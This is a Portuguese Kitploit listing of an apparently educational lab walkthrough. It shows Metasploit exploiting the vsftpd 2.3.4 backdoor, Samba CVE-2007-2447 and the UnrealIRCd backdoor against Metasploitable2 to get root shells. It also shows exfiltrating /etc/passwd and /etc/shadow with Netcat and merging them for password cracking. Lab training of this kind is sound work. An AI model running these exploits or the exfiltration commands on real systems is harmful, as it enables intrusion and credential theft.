Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
metasploitable2-exploitation-metasploit — Passo a passo completo de exploração com Metasploit contra o Metasploitable2 — backdoor do vsftpd, Samba CVE-2007-2447, backdoor do UnrealIRCd, exfiltração com Netcat e preparação para quebra de credenciais. | Kitploit
Ferramentas/GitHubGitHub/ethicalhackinglabs/metasploitable2-exploitation-metasploit
Quebra de SenhasReconhecimentoFrameworks de ExploraçãoMapeamento de RedeAnálise de VulnerabilidadesExploraçãoExfiltração de DadosTestes de PenetraçãoComando e Controle

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Aprendizado e Educação
Desenvolvimento de Payloads
Labs e Prática
GitHubethicalhackinglabs/metasploitable2-exploitation-metasploit

metasploitable2-exploitation-metasploit

Passo a passo completo de exploração com Metasploit contra o Metasploitable2 — backdoor do vsftpd, Samba CVE-2007-2447, backdoor do UnrealIRCd, exfiltração com Netcat e preparação para quebra de credenciais.

Ver Repositório
há 1 mêsAinda não revisado

Explorando o Metasploitable2 com o Metasploit: VSFTPD, Samba e Mais

Um tutorial prático de exploração usando o Metasploit Framework — desde a configuração do banco de dados PostgreSQL e o escaneamento com db_nmap, passando por três shells de root via vsftpd, Samba e UnrealIRCd, até a exfiltração de credenciais com o Netcat.


Visão Geral

Este repositório documenta um engajamento completo do Metasploit contra o Metasploitable2 em um laboratório isolado no VirtualBox. Tópicos abordados:

  • Configurando o Metasploit com backend PostgreSQL e workspaces
  • Executando db_nmap para salvar os resultados do escaneamento diretamente no banco de dados
  • Explorando o backdoor do vsftpd 2.3.4 (comprometimento da cadeia de suprimentos)
  • Explorando o Samba CVE-2007-2447 (usermap_script injeção de comando)
  • Exfiltrando /etc/passwd e /etc/shadow via Netcat e mesclando com unshadow
  • Explorando o backdoor do UnrealIRCd 3.2.8.1

Ambiente de Laboratório

MáquinaFunçãoEndereço IP
Kali Linux 2026.1Atacante192.168.1.4
Metasploitable2Alvo192.168.1.3

Rede: 192.168.1.0/24 — rede NAT totalmente isolada dentro do VirtualBox.


Passo 1 — Configuração do Metasploit e Escaneamento com Banco de Dados

root@kitploit:~
# Start PostgreSQL and initialize the database (one time only)
sudo systemctl start postgresql
sudo msfdb init

# Launch Metasploit
msfconsole

Kali e Metasploitable2 em execução

Atualização do Kali e início do PostgreSQL

root@kitploit:~
msf6> db_status           # Verify: Connected to msf. Connection type: postgresql.
msf6> workspace -a 178-metasploitable2
msf6> workspace           # Confirm active workspace

Saída do db_status e do workspace

root@kitploit:~
msf6> db_nmap -A 192.168.1.0/24 -n

Escaneamento db_nmap em andamento

root@kitploit:~
msf6> hosts
msf6> services

Saída de hosts e services

Dois servidores FTP encontrados no Metasploitable2:

PortaServiçoInformações
21/tcpftpvsftpd 2.3.4
2121/tcpftpProFTPD 1.3.1

Passo 2 — Explorando o vsftpd 2.3.4 (Backdoor)

Em julho de 2011, o arquivo de código-fonte do vsftpd 2.3.4 foi comprometido — foi inserido um backdoor que abre um shell de root na porta 6200 quando o nome de usuário FTP contém :). CVE: CVE-2011-2523. Diff do código: https://pastebin.com/AetT9sS5

root@kitploit:~
msf6> search type:exploit name:vsftpd
# Result: exploit/unix/ftp/vsftpd_234_backdoor  (rank: excellent)

msf6> use exploit/unix/ftp/vsftpd_234_backdoor
msf6> info

Informações do exploit vsftpd - parte 1

Informações do exploit vsftpd - parte 2

Opções do vsftpd (show options)

Definindo RHOSTS, RPORT e LHOST no vsftpd

root@kitploit:~
msf6> set RHOSTS 192.168.1.3
msf6> set RPORT 21
msf6> set LHOST 192.168.1.4
msf6> exploit

Execução do exploit vsftpd e sessão do Meterpreter

ls no sistema de arquivos root remoto

root@kitploit:~
meterpreter> shell
whoami          # root
uname -a        # Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Saída de whoami root e uname -a

Extrair senhas com hash:

root@kitploit:~
cat /etc/shadow | grep '$1'

Senhas com hash no arquivo shadow


Passo 3 — Explorando o Samba CVE-2007-2447

As versões do Samba 3.0.0–3.0.25rc3 passam metacaracteres de shell no campo de nome de usuário diretamente para /bin/sh por meio da opção username map script — antes que a autenticação ocorra. O Metasploitable2 executa o Samba 3.0.20-Debian.

root@kitploit:~
msf6> search type:exploit name:samba
# ~7 exploits found

msf6> use exploit/multi/samba/usermap_script
msf6> info

Lista de exploits do Samba na busca

Informações do Samba usermap_script

Descrição do CVE do Samba e referências

root@kitploit:~
msf6> set RHOSTS 192.168.1.3
msf6> exploit

Execução do exploit do Samba - sessão aberta

whoami root e smbd --version no shell do Samba

root@kitploit:~
whoami          # root
smbd --version  # Version 3.0.20-Debian

Exfiltração de Arquivos com Netcat

Aba 2 — Kali (recebendo):

root@kitploit:~
nc -l -p 4567 > passwd.txt

Aba 1 — Shell do exploit (enviando):

root@kitploit:~
cat /etc/passwd | nc 192.168.1.4 4567

Listener do Netcat no Kali recebendo o passwd

Conteúdo de passwd.txt após a exfiltração

Repita para /etc/shadow e depois mescle:

root@kitploit:~
unshadow passwd.txt shadow.txt > metasploitable_logins.txt
cat metasploitable_logins.txt

Passo 4 — Explorando o UnrealIRCd 3.2.8.1 (Backdoor)

O UnrealIRCd 3.2.8.1 foi distribuído com um backdoor em seu código-fonte. Enviar AB para a porta 6667 faz o servidor executar qualquer comando subsequente como root — sem exigir autenticação.

root@kitploit:~
msf6> use exploit/unix/irc/unreal_ircd_3281_backdoor
msf6> set payload cmd/unix/bind_netcat
msf6> set RHOSTS 192.168.1.3
msf6> set LHOST 192.168.1.4
msf6> set RPORT 6667
msf6> exploit

Opções do exploit UnrealIRCd e execução

Shell de root do UnrealIRCd - whoami e uname -a

root@kitploit:~
whoami   # root
uname -a # Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Opções necessárias:


Fluxo de Trabalho do Metasploit em Resumo

root@kitploit:~
db_nmap → hosts → services → search → use → info → show options → set → exploit → shell

Erros Comuns


Principais Conclusões

  • vsftpd 2.3.4 e UnrealIRCd 3.2.8.1 foram ambos comprometimentos da cadeia de suprimentos — backdoors embutidos nos arquivos oficiais de distribuição
  • O CVE-2007-2447 no Samba é acionado antes da autenticação — aplicar patches é a única mitigação
  • O Netcat não requer dependências e funciona para exfiltração de arquivos em praticamente qualquer sistema Unix
  • Usar info antes do exploit é um hábito que vale a pena cultivar — ele exibe o CVE, as versões afetadas e as opções necessárias

🌐 Conecte-se Comigo

LinkedIn Dev.to

Baixar ferramenta
OpçãoValorDescrição
RHOSTS192.168.1.3IP do alvo
RPORT6667Porta padrão do IRC
LHOST192.168.1.4IP do listener no Kali
payloadcmd/unix/bind_netcatBind shell via Netcat
ErroO que AconteceCorreção
Pular o msfdb initSem banco de dados — os resultados do escaneamento não são salvosExecute sudo msfdb init uma vez antes do primeiro uso
Não definir LHOSTO reverse shell não tem para onde retornarSempre defina LHOST para o IP do seu Kali
Executar msfdb init a cada sessãoSobrescreve os dados existentesExecute apenas uma vez; verifique com sudo msfdb status
RPORT erradoO exploit falha silenciosamenteConfirme a porta em services antes de definir
Fechar o listener do Netcat cedo demaisTransferência de arquivo truncadaAguarde um momento após o comando com pipe antes do CTRL-C
Pular o unshadowCrackers de senha rejeitam o formato de arquivo divididoSempre mescle passwd + shadow primeiro